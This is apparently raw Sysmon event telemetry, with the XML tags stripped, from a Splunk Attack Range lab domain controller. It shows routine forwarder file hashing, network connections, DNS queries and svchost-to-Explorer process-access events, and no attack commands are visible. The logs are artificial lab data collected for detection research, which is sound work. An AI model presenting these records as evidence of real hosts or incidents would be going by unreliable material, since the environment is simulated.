Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FB3C2557128140939CF851C6B2FC77D,SHA256=E2DC7CFB9B331BF397FC38984B407436A022F72444DB235A18345FFA5D674888,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:23.602{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53667-false10.0.1.12-8000- 23542300x800000000000000010043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:24.151{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8090224AC1BB810842AFD700065AD9DC,SHA256=FF52F85C80C543A55BCB8BE93B36403C01F755D38834B1878965BA740BCBC3BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:25.229{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2964A1D5C9F2A4BF58E28F494A63C254,SHA256=CA74A6FBA16F8C823D055398B8E765A4519D5D17BF3BE6BB0D626E8AE8CAB75D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:26.291{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B9B81C8600B38DA0E0883C79DE77F47,SHA256=99735FC14470908F7FE65A8AC24BDB5380C719FE0DC80E0D8D91DD65B783DD8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:27.290{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7EA6F0A0C59E70DF70476EBA690E1E6,SHA256=E4AA267B692C50E6BF65B1690F8150C9AD6135474C2EA2B6371239101A9CA0CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:28.306{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F8A3737E66A8CB38829240BC4A1DB10,SHA256=AD87376CB4939BED22F06F88E2239B6C5F9311B8EE5E1D5AFC5186297F5DFA69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:29.758{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=2313D5E228884E38771C53923B0754D9,SHA256=E529C5BC81C8B303489DDB297E5CD96210622B68E3CF428B20DFC94D02FEDB1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:29.758{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=A9A4FAF5A3E25EF77F35D927530EF9BA,SHA256=35323F1BAD6DBDAB187D1143D8E1A3489E6635A09DFC78BC2244B12927865591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:29.337{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=895BAB5982FA224797B2A80CB445E9F6,SHA256=B8E1EDA95A5494B929C34BAAC261934126BB89102FA10942C10E82B2BF0934E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.774{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD1B69D2A7563846DA5258F220E87FF2,SHA256=5C93703A25BAC76EBD45731A98181C3B5E55A5B6B87792B860B0870ABE146A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.774{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A8F35FB1853726D2A7285DCC9C44DAE,SHA256=DF89B85D1415DC4525AD7C8137C3313F0CF29A139326B4B4B7C938D54285AD16,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:29.540{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53668-false10.0.1.12-8000- 23542300x800000000000000010052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.414{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD800368474603438F4E778BE8D887AE,SHA256=40327CF2BBE49A1A4B8532DB95BAB7CAC13E2300CFF80A9B190BCF2DC79A0E00,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000010063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.148{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 354300x800000000000000010062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.142{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57238- 354300x800000000000000010061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.141{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64494- 354300x800000000000000010060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.135{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53670-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x800000000000000010059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.135{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53670-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x800000000000000010058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.134{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53669-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x800000000000000010057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.134{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53669-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 23542300x800000000000000010056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:31.430{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35728F4758D009F42268AD0791BA28A3,SHA256=32DA6F5C780337D6F6CEC3B1A2722B2A99810BFDDF747879D1B03AA224BF33FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:32.445{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7481CE6585D6FD529B599BB2B7531675,SHA256=3C575887D4BA28CE46585645070FC1A020CD29ABA1D75A7DAD7CFEA55F9B07FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:33.460{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4F27CBE5B863D89E7CF92B87039F53C,SHA256=7E93A929927F5E140AE329B2F657825768CCE64A24D9834565920FD0242D1280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:34.476{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBF41415D77786828F20B3512663A592,SHA256=C9C606733FE1F4B5808B5A0A03CF0E5A89A1B2F804423D609AF83797F84DBF75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:35.491{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2F867AAB33083A8FF1BE598C90BB0B2,SHA256=0EB1959A455A21F60D93CB894597598A638AA4752D654B79C8D6864EAA063BD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:35.493{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53671-false10.0.1.12-8000- 23542300x800000000000000010068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:36.506{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C105EAA788B9CF5641F000E3DD0BDF7A,SHA256=E5736FD84A42F2D15F8C8AD4E6ABBA6B65B8220FCA276E91E01334D099CC0E34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:37.522{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DF279185DB22B2EF2B7E05EBDFF4F8A,SHA256=2C0DBA9412904B559934825D651B885F3CD0EDA6B4D147B9478D90F4EBB40B35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:38.537{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB5FE0B0F5BA5E987716DA3A7484C9F1,SHA256=D0AB6934A873F29D7737CADE9F0676F72F3B9C039E5CFE5F4C213E88FCE02AEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:39.552{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83756C01C137F3879C6F94A2D92238E,SHA256=C0F8DB699BDAD1BFE501923D546AEAFD5E8558CD1F8C1A7756E4C9EFF2ED8B09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:40.568{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D9ABD666D60C27F9A73B24F4597A550,SHA256=477B52569E16A536DC768F7FB77F8DEBEBA96667E043347689C4ACC176212404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:41.583{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9952998A14850DA36013F11D3DDCA064,SHA256=E0B26C40AE89AA800BACE282ABBAA62EF333413AE18D186D0CEDE76C96430A16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:42.598{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43BCBE34F2D09B89E8968B4D820D915E,SHA256=36C5573D4CD4C9B99D7B593441614D57312C1A64C0FACF82F725C55D8C1A1E37,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:40.633{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53672-false10.0.1.12-8000- 23542300x800000000000000010078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:43.598{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E73F2C9F6EDE863116D0C43D24C8DFD,SHA256=90FEFD714B2D2EC4E2DDA104B3A4965DD260CD419D698FAB0905A1CACBA939B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:43.317{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C746AB578AC1A164E2078F657B69FD4C,SHA256=A39F231DCD698E64FCABCBEDDBEAE1284A24A56D18E0223791B847C9C319E5A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:44.613{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CEF0D3B09EF6B3B434016BF6D681176,SHA256=5BBC130BF983B564402E1AE1AD5F173AF1D5E7F9C122F71209D6BB84E38C1F97,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:44.457{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x800000000000000010079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:44.457{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2F6750572F4D9AB8D312C6AC6AB4E2B4,SHA256=2684CEDC46745BC97B4383266D133B3786AAFA551573444F848504D01F5FDA4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:45.644{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E89D020A174F8A636A7881E4DF752E7,SHA256=3C6D42A1B03BC53C89079AB9318E194DD3B91B5ACF879817BDB81A9E472245DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:46.722{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E02FA2416D964C09E5F3CBA8E614DF0D,SHA256=126141F9ABFF6F783DE7ADBC2D60F996D25EC3FAD75E171799FD9BEE1435AE7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.847{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78CB910C709A61BBC761B6F8B004D821,SHA256=4AC957068E57497E510C8AD7B977EAC833CEA688BA99447745F3944115400232,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 